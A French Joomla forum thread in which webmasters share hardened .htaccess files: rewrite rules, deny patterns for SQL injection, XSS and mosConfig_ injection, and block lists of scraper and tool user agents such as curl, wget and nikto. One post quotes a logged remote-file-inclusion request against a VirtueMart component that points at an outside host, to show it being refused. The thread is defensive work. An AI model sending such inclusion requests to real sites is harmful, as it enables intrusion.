Joomladay francophone 2018 à Paris 18 et 19 mai

htaccess avec ovh mutu (long)

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • htaccess avec ovh mutu (long)

    Salut à tous,

    ça fait plusieurs jours que je me casse la tête avec la sécurité.
    d'abord installé et activé sh404sef, puis sentinelle, puis les deux, tout ça couplé avec un htaccess (normalement) blindé (cf les divers forums étudiés)

    bref, malgré tout ça, toujours quelques attaques qui passent (visibles dans les logs web ovh), pas dangereuses normalement car site à jour, mais ni htaccess, ni sh404sef ni sentinelle ne les voyaient.

    Pour tester un peu, je m'amuse à mettre les "mots interdits" dans l'url de mon site de tests, et parfois j'ai un message dans ma boite mail, parfois, rien, même pas la page forbidden vers laquelle le htaccess doit normalement rediriger.

    J'ai fini par trouver un post très intéressant chez ovh sur le htaccess, qui m'a permis de construire ce htaccess.
    J'ai testé essentiellement la partie rewriterules de protection des failles potentielles, qui semble fonctionner, puisqu'à chaque test j'ai un forbidden, et aucun message ni aucun log des outils de protections suivants.

    Pour tester c'est simple, je prends une requête effectuée par une tentative de hack (récupérable dans un mail que j'ai reçu ou sur un forum, celui-là en particulier), j'enlève le fichier de la fin (celui qui doit se charger si la faille existe) et j'envoie.

    Bref, voici au final le htaccess que je vais utiliser:
    Code:
    ###################################
    ##
    # @version $Id: htaccess.txt 9975 2008-01-30 17:02:11Z ircmaxell $
    # @package Joomla
    # @copyright Copyright (C) 2005 - 2008 Open Source Matters. All rights reserved.
    # @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
    # Joomla! is Free Software
    ##
    
    ## mes modifs:
    SetEnv REGISTER_GLOBALS 0
    SetEnv PHP_VER 5
    #allow_url_include 0 # déjà présente chez ovh par défaut
    AddDefaultCharset UTF-8
    Options -Indexes
    <Files .htaccess>
    order allow,deny
    deny from all
    </Files>
    ## fin de mes modifs
    
    #####################################################
    #  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
    #
    # The line just below this section: 'Options +FollowSymLinks' may cause problems
    # with some server configurations.  It is required for use of mod_rewrite, but may already
    # be set by your server administrator in a way that dissallows changing it in
    # your .htaccess file.  If using it causes your server to error out, comment it out (add # to
    # beginning of line), reload your site in your browser and test your sef url's.  If they work,
    # it has been set by your server administrator and you do not need it set here.
    #
    #####################################################
    
    ##  Can be commented out if causes errors, see notes above.
    Options +FollowSymLinks
    
    #
    #  mod_rewrite in use
    
    RewriteEngine On
    RewriteBase /
    RewriteCond %{HTTP_HOST} ^site-test.fr$ 
    RewriteRule ^(.*)   http://www.site-test.fr/$1  [QSA,L,R=301]
    
    ###############################################
    # On bloque toute une série de failles potentielles
    ###############################################
    RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
    RewriteCond %{QUERY_STRING} mosConfig_ [NC,OR]
    RewriteCond %{QUERY_STRING} ^(.*)(%3C|<)/?script(.*)$ [NC,OR]
    RewriteCond %{QUERY_STRING} ^(.*)(%3D|=)?javascript(%3A|:)(.*)$ [NC,OR]
    RewriteCond %{QUERY_STRING} ^(.*)document\.location\.href(.*)$ [NC,OR]
    RewriteCond %{QUERY_STRING} ^(.*)base64_encode(.*)$ [NC,OR]
    RewriteCond %{QUERY_STRING} ^(.*)GLOBALS(=|[|%[0-9A-Z]{0,2})(.*)$ [NC,OR]
    RewriteCond %{QUERY_STRING} ^(.*)_REQUEST(=|[|%[0-9A-Z]{0,2})(.*)$ [NC,OR]
    RewriteCond %{QUERY_STRING} ^(.*)(SELECT|INSERT|DELETE|CHAR\(|UPDATE|REPLACE|LIMIT)(.*)$
    RewriteRule (.*) - [F]
    ###############################################
    
    ########## Begin - Joomla! core SEF Section
    #
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteCond %{REQUEST_URI} !^/index.php
    RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$  [NC]
    RewriteRule (.*) index.php
    RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
    #
    ########## End - Joomla! core SEF Section
    
    ### DES FAUX URLS, ON LES NEUTRALISE
    RedirectMatch gone ^/_vti.*
    RedirectMatch gone ^/MSOffice.*
    RedirectMatch gone ^.*/etc/passwd.*
    
    #empêcher les liens directs vers mes images à partir d'autres sites
    RewriteCond %{HTTP_REFERER} !^$
    RewriteCond %{HTTP_REFERER} !^http://www.site-test.fr/.*$ [NC]
    ReWriteRule .*\.(gif|png|jpe?g)$ - [F]
    ################################
    je le livre ici pour qu'il soit critiqué si besoin (avec les regexp je suis un nul, j'ai repris celles définies dans le post chez ovh, après avoir fait quelques tests de variantes)

    Je pense que cet htaccess peut être testé tel quel en remplaçant "site-test" par le nom du site.

    Voilà, au cas où ça intéresse quelqu'un
    On n'est jamais trop bon, ce sont ceux qui en profitent qui sont trop cons. (Réflexion)
    http://www.tranquille-informatique.fr

  • #2
    Merci pour tes bon posts!

    Pour compléter la "panoplie" peut être serais tu intéressé par :

    GuardXT (donne des infos serveur, et permet la vérif des chmod, et permet de lister les composants installés, et vérifier les mises à jour: ok manuellement, mais c'est tout de même intéressant)
    http://extensions.joomla.org/extensi...y/7013/details

    GuardianLight (je ne sais pas si cela fait doublon ou rajoute des rêgles par rapport à sentinelle, perso, j'ai les 2...)
    http://forum.joomla.fr/showthread.php?t=75638&page=3

    BadBehavior:
    http://extensions.joomla.org/extensi...s/2891/details

    Je vais compléter mes rêgles de "mon" (de Sirius sur ce forum) .htacess avec les tiennes et fais un retour...
    Enjoy J!

    Commentaire


    • #3
      super les gars, un grand merci!

      a plus
      sommaire thématique des astuces du forum e-commerce ici http://www.webtimarket.com/fr/telechargements
      http://virtuemart.fr

      Commentaire


      • #4
        en complément, voici tirés des logs ovh, la réponse à une requête lors d'une attaque::
        d'abord, les règles de réécritures joomla par défaut sont avant les règles de contrage de failles:

        Code:
        ""GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://r-shooter.com/bbs/data/test.txt HTTP/1.1" 200 20 "
        et ensuite, les règles de contrages sont avant les règles de joomla:
        Code:
        GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://r-shooter.com/bbs/data/test.txt HTTP/1.1" 403 215 "
        remarquez ici la réponse du serveur, en 403 (Forbidden) alors qu'avant elle était en 200 (ok)

        L'important dans tout ça, c'est que les règles mises pour contrer les failles doivent arriver avant les règles de réécriture joomla, mais après le rewriteEngine On.
        (allez voir dans le htaccess posé, il est bien dans l'ordre)
        Sinon ça passe et on dépend ensuite du composant ou plugin installé (sh404, sentinelle ou autre) ...
        On n'est jamais trop bon, ce sont ceux qui en profitent qui sont trop cons. (Réflexion)
        http://www.tranquille-informatique.fr

        Commentaire


        • #5
          Envoyé par crony Voir le message
          Merci pour tes bon posts!

          Pour compléter la "panoplie" peut être serais tu intéressé par :
          ...
          Je vais compléter mes rêgles de "mon" (de Sirius sur ce forum) .htacess avec les tiennes et fais un retour...
          ok, j'ai jeté un oeil, en fait je ne souhaite pas bannir, donc ces composants sont en général trop complets pour moi.

          merci.
          On n'est jamais trop bon, ce sont ceux qui en profitent qui sont trop cons. (Réflexion)
          http://www.tranquille-informatique.fr

          Commentaire


          • #6
            Tu n'es pas obligé de bannir du tout, tu peux le configurer pour être averti simplement...
            Enjoy J!

            Commentaire


            • #7
              Ok, après petite recherche donc, j'ai finalement installé crawltrack...

              mais comme tous ces "softs" apparemment, il ne remonte pas les "erreurs" en 403.
              du coup, je n'ai plus de messages d'avertissement d'attaques, mais je suis allé voir, toutes les attaques (pour le moment) sont redirigées illico en 403.

              d'un côté c'est bien, le fonctionnement par htaccess est normalement très fiable il me semble, mais de l'autre, ça stresse un peu de ne rien voir
              On n'est jamais trop bon, ce sont ceux qui en profitent qui sont trop cons. (Réflexion)
              http://www.tranquille-informatique.fr

              Commentaire


              • #8
                Bonjour,
                Trés bonne inititiative!

                Voici mon .htaccess

                Code:
                # Utilisation de php 5
                SetEnv PHP_VER 5
                # Identifiant de session placé dans le cookie
                SetEnv SESSION_USE_TRANS_SID 0
                # Register Globals : Off
                SetEnv REGISTER_GLOBALS 0
                # Magic Quotes GPC : On 
                SetEnv MAGIC_QUOTES 1
                # Activation de l'optimiseur Zend
                SetEnv ZEND_OPTIMIZER 1
                # Interdit le traitement des url en tant que fichier
                SetEnv ALLOW_URL_FOPEN 0
                # bloque affichage messages erreur
                SetEnv DISPLAY_ERRORS 0
                # Interdire acces htaccess
                <Files .htaccess>
                order allow,deny
                deny from all
                </Files>
                # Interdire acces configuration
                <Files configuration.php>
                order allow,deny
                deny from all
                </Files>
                # Desactiver messages serveur
                ServerSignature Off
                # Bloquer affichage contenu dossiers
                #Options -Indexes
                ### INTERDIRE LES AUTRES TYPES DE FICHIER INDEX
                <Files ~ "^(index)\.(p?s?x?htm?|txt|aspx?|cfml?|cgi|pl|php[3-9]|jsp|xml)$">
                order allow,deny
                deny from all
                </Files>
                #####
                ### INTERDIRE L'AFFICHAGE DE CERTAINS FORMATS DE FICHIER 
                ### EXÉCUTÉS PAR LE SERVEUR MAIS INTERDIT D'AFFICHAGE PAR LE NAVIGATEUR WEB
                <Files ~ "\.(inc|class|sql|ini|conf|exe|dll|bin|tpl|bkp|dat|c|h|py|spd|theme|module)$">
                deny from all
                </Files>
                ###FILTRE CONTRE ROBOTS DES PIRATES ET ASPIRATEURS DE SITE WEB
                ### LISTE ICI: http://www.toulouse-renaissance.net/c_outils/
                ## EXCEPTION: TOUS LES ROBOTS MEMES ANONYMES OU BANNIS PEUVENT ACCEDER A CES FICHIERS
                RewriteCond %{REQUEST_URI} !^/robots.txt
                RewriteCond %{REQUEST_URI} !^/sitemap.xml
                ## 
                RewriteCond %{HTTP_USER_AGENT} ^-?$ [OR]
                RewriteCond %{HTTP_USER_AGENT} ^[bcdfghjklmnpqrstvwxz\ ]{8,}|^[0-9a-z]{15,}|^[0-9A-Za-z]{19,} [OR]
                RewriteCond %{HTTP_USER_AGENT} ^<sc|8484\ Boston\ Project|autoemailspider|@nonymouse|ADSARobot|Advanced\ Email\ Extractor|^adwords|ah-ha|aktuelles|amzn_assoc|Anarchie|anonymous|Art-Online|ASPSeek|ASSORT|ATHENS|Atomz|attach|autoemailspider|BackWeb|Bandit|BatchFTP|bdfetch|big.brother|BlackWidow|blogsearchbot-martin|bmclient|Boston\ Project|BravoBrian\ SpiderEngine\ MarcoPolo|Bullseye|bumblebee|capture|CherryPicker|ChinaClaw|CICC|clipping|Crescent|Crescent\ Internet|curl|Custo|cyberalert|Deweb|diagem|Digger|Digimarc|DIIbot|DirectUpdate|disco|DISCoFinder|Downloader|Download\ Accelerator|Download\ Demon|Download\ Wonder|Drip|DSurf15a|DTS.Agent|EasyDL|eCatch|echo\ extense|ecollector|efp@gmx\.net|EirGrabber|EmailCollector|EmailSiphon|Email\ Siphon|EmailWolf|Email\ Extractor|Express\ WebPictures|ExtractorPro [NC,OR]
                RewriteCond %{HTTP_USER_AGENT} EyeNetIE|fastlwspider|FavOrg|Favorites\ Sweeper|^Fetch|Fetch\ API\ Request|FEZhead|FileHound|flashget|FlashGet\ WebWasher|FlickBot|fluffy|frontpage|GalaxyBot|Generic|Getleft|GetRight|GetSmart|GetWeb!|GetWebPage|gigabaz|Girafabot|Go!Zilla|go-ahead-got-it|GornKer|Grabber|GrabNet|Grafula|Green\ Research|grub-client|grub\ crawler|GT\:\:WWW|hanzoweb|Harvest|hhjhj@yahoo|hloader|HMView|HomePageSearch|HTTPConnect|httpdown|httplib|HttpProxy|HTTP\ agent|http\ generic|HTTP\:\:Lite|HTTrack|ia_archive|IBM_Planetwide|imagefetch|Image\ Stripper|Image\ Sucker|IncyWincy|Indy\ Library|informant|Ingelin|InterGET|InternetLinkAgent|InternetSeer\.com|^Internet\ Explorer|Internet\ Ninja|IPiumBot|Iria|Irvine|Jakarta\ Commons|^Java\ 1.|^Java/1.|JBH*Agent [NC,OR]
                RewriteCond %{HTTP_USER_AGENT} JetCar|JOC|JOC\ Web\ Spider|JustView|Kapere|KWebGet|Lachesis|larbin|LeechFTP|LexiBot|lftp|libWeb|libwww|likse|Link*Sleuth|LINKS\ ARoMATIZED|LinkWalker|LWP|Mac\ Finder|Mag-Net|Magnet|Mass\ Downloader|MCspider|Microsoft\ URL|Microsoft\ Data|MIDown\ tool|minibot\(NaverRobot\)|Mirror|Missigua|Mister\ PiX|MJ12bot|MMMtoCrawl\/UrlDispatcherLLL|Movable\ Type|Moozilla|^Mozilla$|^MSIE|Murzillo|MSProxy|multithreaddb|nationaldirectory|Navroad|NearSite|NetAnts|NetCarta|NetMechanic|netprospector|NetResearchServer|NetSpider|NetZIP|NetZippy|NetZip\ Downloader|Net\ Vampire|NEWT|nicerspro|NICErsPRO|NPBot|NutchCVS|Nutscrape/|Octopus|Offline\ Explorer|Offline\ Navigator|OmniExplorer|OpaL|Openfind|OpenTextSiteCrawler [NC,OR]
                RewriteCond %{HTTP_USER_AGENT} OrangeBot|PackRat|PageGrabber|Papa\ Foto|pavuk|pcBrowser|PEAR|PersonaPilot|PingALink|Pockey|Program\ Shareware|Proxy|psbot|PSurf|psycheclone|^puf|Pump|PushSite|PussyCat|PycURL|python|QRVA|QuepasaCreep|RealDownload|Reaper|Recorder|ReGet|replacer|RepoMonkey|almaden|Robozilla|Rover|RPT-HTTPClient|Rsync|SearchExpress|searchhippo|searchterms\.it|Second\ Street\ Research|Seeker|Shai|sitecheck|SiteMapper|SiteSnagger|SlySearch|SmartDownload|snagger|SpaceBison|Spegla|SpiderBot|SqWorm|Star\ Downloader|Stripper|sucker|SuperBot|SuperHTTP|Surfbot|SurfWalker|SurveyBot|Szukacz|tAkeOut|tarspider|Teleport\ Pro|Telesoft|Templeton|TrackBack|TrueRobot|Turing|TurnitinBot [NC,OR]
                RewriteCond %{HTTP_USER_AGENT} TV33_Mercator|UIowaCrawler|URI\:\:Fetch|URL_Spider_Pro|^user|^User\ Agent:\ |^User-Agent:\ |UtilMind|Vacuum|vagabondo|vayala|visibilitygap|vobsub|VoidEYE|vspider|w3mir|WebaltBot|WebAuto|webbandit|WebCapture|Webclipping|webcollage|webcollector|WebCopier|webcraft@bea|WebDAV|webdevil|webdownloader|Webdup|WebEmailExtractor|WebFetch|WebGo\ IS|WebHook|Webinator|WebLeacher|WEBMASTERS|WebMiner|WebMirror|webmole|WebReaper|WebSauger|WEBsaver|Website\ eXtractor|Website\ Quester|WebSnake|Webster|WebStripper|websucker|webvac|webwalk|webweasel|WebWhacker|WebZIP|Web\ Data\ Extractor|Web\ Downloader|Web\ Image\ Collector|Web\ Sucker|web\.by\.mail|Wget|whizbang|WhosTalking|Widow|Widows|WISEbot|WISEnutbot|WUMPUS|Wweb|WWWOFFLE|Wysigot|x-Tractor|Xaldon\ WebSpider|XGET|Yandex|Zeus|Zeus.*Webster [NC]
                RewriteRule (.*) - [F]
                ### DES FAUX URLS, ON LES NEUTRALISE
                RedirectMatch gone ^/_vti.*
                RedirectMatch gone ^/MSOffice.*
                RedirectMatch gone ^[-_a-z0-9/\.]*//.*
                ##

                Commentaire


                • #9
                  la suite...
                  Code:
                  ######
                  # CHARACTER STRINGS
                  <IfModule mod_alias.c>
                   # BASIC CHARACTERS
                   #RedirectMatch 403 \,
                   RedirectMatch 403 \:
                   #RedirectMatch 403 \;
                   RedirectMatch 403 \=
                   RedirectMatch 403 \@
                   RedirectMatch 403 \[
                   RedirectMatch 403 \]
                   RedirectMatch 403 \^
                   RedirectMatch 403 \`
                   RedirectMatch 403 \{
                   RedirectMatch 403 \}
                   RedirectMatch 403 \~
                   RedirectMatch 403 \"
                   RedirectMatch 403 \$
                   RedirectMatch 403 \<
                   RedirectMatch 403 \>
                   RedirectMatch 403 \|
                   RedirectMatch 403 \.\.
                   RedirectMatch 403 \/\/
                   RedirectMatch 403 \%0
                   RedirectMatch 403 \%A
                   RedirectMatch 403 \%B
                   RedirectMatch 403 \%C
                   RedirectMatch 403 \%D
                   RedirectMatch 403 \%E
                   RedirectMatch 403 \%F
                   RedirectMatch 403 \%22
                   RedirectMatch 403 \%27
                   RedirectMatch 403 \%28
                   RedirectMatch 403 \%29
                   RedirectMatch 403 \%3C
                   RedirectMatch 403 \%3E
                   RedirectMatch 403 \%3F
                   RedirectMatch 403 \%5B
                   RedirectMatch 403 \%5C
                   RedirectMatch 403 \%5D
                   RedirectMatch 403 \%7B
                   RedirectMatch 403 \%7C
                   RedirectMatch 403 \%7D
                   # COMMON PATTERNS
                   RedirectMatch 404 wp\_
                   Redirectmatch 403 \_vpi
                   RedirectMatch 403 \.inc
                   Redirectmatch 403 xAou6
                   Redirectmatch 403 db\_name
                   Redirectmatch 403 select\(
                   Redirectmatch 403 convert\(
                   Redirectmatch 403 \/query\/
                   RedirectMatch 403 ImpEvData
                   Redirectmatch 403 \.XMLHTTP
                   Redirectmatch 403 proxydeny
                   RedirectMatch 403 function\.
                   Redirectmatch 403 remoteFile
                   Redirectmatch 403 servername
                   Redirectmatch 403 \&rptmode\=
                   Redirectmatch 403 sys\_cpanel
                   RedirectMatch 403 db\_connect
                   RedirectMatch 403 doeditconfig
                   RedirectMatch 403 check\_proxy
                   Redirectmatch 403 system\_user
                   Redirectmatch 403 \/\(null\)\/
                   Redirectmatch 403 clientrequest
                   Redirectmatch 403 option\_value
                   RedirectMatch 403 ref\.outcontrol
                   # SPECIFIC EXPLOITS
                   RedirectMatch 403 errors\.
                   #RedirectMatch 403 config\.
                   RedirectMatch 403 include\.
                   RedirectMatch 403 display\.
                   RedirectMatch 403 register\.
                   Redirectmatch 403 password\.
                   RedirectMatch 403 maincore\.
                   RedirectMatch 403 authorize\.
                   Redirectmatch 403 macromates\.
                   RedirectMatch 403 head\_auth\.
                   RedirectMatch 403 submit\_links\.
                   RedirectMatch 403 change\_action\.
                   Redirectmatch 403 com\_facileforms\/
                   RedirectMatch 403 admin\_db\_utilities\.
                   RedirectMatch 403 admin\.webring\.docs\.
                   Redirectmatch 403 Table\/Latest\/index\.
                  </IfModule>
                  # Block out any script trying to set a mosConfig value through the URL 
                  RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR] 
                  # Block out any script trying to base64_encode crap to send via URL 
                  RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR] 
                  # Block out any script that includes a <script> tag in URL 
                  #RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
                  # Block out javascript
                  RewriteCond %{QUERY_STRING} ^(.*)(%3D|=)?javascript(%3A|:)(.*)$ [NC,OR] 
                  # Block out any script trying to set a PHP GLOBALS variable via URL 
                  RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] 
                  # Block out any script trying to modify a _REQUEST variable via URL 
                  RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR] 
                  # securite en plus 
                  RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC,OR] 
                  RewriteCond %{QUERY_STRING} ^.*(localhost|loopback|127\.0\.0\.1).* [NC,OR] 
                  #RewriteCond %{QUERY_STRING} ^.*\.[A-Za-z0-9].* [NC,OR] 
                  RewriteCond %{QUERY_STRING} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR] 
                  # Disable TRACE & TRACK methods 
                  RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC,OR] 
                  RewriteCond %{THE_REQUEST} ^.*(\\r|\\n|%0A|%0D).* [NC,OR] 
                  RewriteCond %{HTTP_REFERER} ^(.*)(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR] 
                  RewriteCond %{HTTP_COOKIE} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC,OR] 
                  # RewriteCond %{REQUEST_URI}     ^/(,|;|:|<|>|">|"<|/|\\\.\.\\).{0,9999}.* [NC,OR] 
                  RewriteCond %{HTTP_USER_AGENT} ^$ [OR] 
                  #RewriteCond %{HTTP_USER_AGENT} ^(java|curl|wget).* [NC,OR] 
                  RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]
                  RewriteCond %{HTTP_USER_AGENT} ^.*(libwww-perl|java|curl|wget|python|nikto|scan).* [NC,OR]
                  RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|'|%0A|%0D|%27|%3C|%3E|%00).* [NC]
                  #RewriteRule .* - [F,L]
                  # Send all blocked request to homepage with 403 Forbidden error!
                  RewriteRule ^(.*)$ index.php [F,L]
                  #  mod_rewrite in use
                  RewriteEngine On
                  Options +FollowSymLinks -Indexes
                  # ServerSignature Off
                  RewriteBase /
                  # Begin - Joomla! core SEF Section 
                   RewriteEngine On 
                  RewriteCond %{REQUEST_FILENAME} !-f 
                  RewriteCond %{REQUEST_FILENAME} !-d 
                  RewriteCond %{REQUEST_URI} !^/index.php 
                  RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$  [NC] 
                  RewriteRule (.*) index.php 
                  RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]

                  Commentaire


                  • #10
                    ouhaahou, c'est du costaud!
                    j'au rai pas le temps de tester chaque ligne pour voir si ça gène rien, donc je vais me contenter de mon petit
                    Finalement j'ai viré crawltrack, pour le moment il ne me sert à rien en gros, et il remplit la base et les logs ovh...
                    On n'est jamais trop bon, ce sont ceux qui en profitent qui sont trop cons. (Réflexion)
                    http://www.tranquille-informatique.fr

                    Commentaire


                    • #11
                      J'espère bien que c'est du costaud car j'utilise également, jsecure et sentinelle : aucun problème majeur à ce jour. Crawltrack? J'ai essayé mais bon...pas encore converti lol

                      Commentaire


                      • #12
                        normalement, tu ne devrais pas avoir de messages de tentative de hack venant de sentinelle, avec cet htaccess...
                        est-ce le cas?
                        je pose cette question car j'ai remarqué que l'ordre dans htaccess avait une importance chez moi, et je voulais, par curiosité, savoir s'il en avant ailleurs.
                        On n'est jamais trop bon, ce sont ceux qui en profitent qui sont trop cons. (Réflexion)
                        http://www.tranquille-informatique.fr

                        Commentaire


                        • #13
                          Oui ok, je comprend.
                          Le .htacces filtre les = et le ?, je comprend
                          Effectivement je ne reçois plus rien de la part de Sentinelle
                          Dernière édition par kanterbrau04 à 22/05/2009, 17h28

                          Commentaire


                          • #14
                            Petit outil...

                            Bon, après avoir bien remodelé mon fichier htaccess, suite à des articles trouvés sur le web, notamment ici, très bonnes explications sur toutes ses pages, celle-ci étant la conclusion, et avec quelques petites adaptations (surtout enlevé toute la partie redirect match), voir ici mon final, j'ai "créé" sans prétention un petit outil pour analyser rapidement les logs générés par le serveur apache pour des sites hébergés en mutu chez ovh uniquement (désolé pour les autres, je n'ai rien pour tester).

                            Pour ceux que ça intéresse, voir ici le détail et le téléchargement.

                            c'est vraiment sans prétention hein, au cas où ça pourrait servir à d'autres...
                            Pour les curieux donc, bonne lecture, et pourquoi pas, bons tests.
                            On n'est jamais trop bon, ce sont ceux qui en profitent qui sont trop cons. (Réflexion)
                            http://www.tranquille-informatique.fr

                            Commentaire


                            • #15
                              Salut Tr@nquille

                              tu pouvait directement aller voir là => http://forum.joomla.fr/showthread.php?t=89166

                              Je vais tester ton petit outil
                              Apprendre à apprendre........
                              www.octeam.fr
                              Pas de support par MP

                              Commentaire

                              Annonce

                              Réduire
                              1 sur 2 < >

                              C'est [Réglé] et on n'en parle plus ?

                              A quoi ça sert ?
                              La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

                              Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

                              Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
                              Comment ajouter la mention [Réglé] à votre discussion ?
                              1 - Aller sur votre discussion et éditer votre premier message :


                              2 - Cliquer sur la liste déroulante Préfixe.

                              3 - Choisir le préfixe [Réglé].


                              4 - Et voilà… votre discussion est désormais identifiée comme réglée.

                              2 sur 2 < >

                              Assistance au forum - Outil de publication d'infos de votre site

                              Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

                              Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

                              Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

                              UTILISER À VOS PROPRES RISQUES :
                              L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

                              Problèmes connus :
                              FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

                              Installation :

                              1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

                              Archive zip : https://github.com/AFUJ/FPA/zipball/master

                              2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

                              3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

                              4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

                              5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

                              6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
                              et remplacer www. votresite .com par votre nom de domaine


                              Exemples:
                              Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/
                              Pour executer le script: http://www..com/fpa-fr.php

                              Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
                              Télécharger le script fpa-fr.php dans: /public_html/cms/
                              Pour executer le script: http://www..com/cms/fpa-fr.php

                              En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

                              Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
                              Voir plus
                              Voir moins
                              Travaille ...
                              X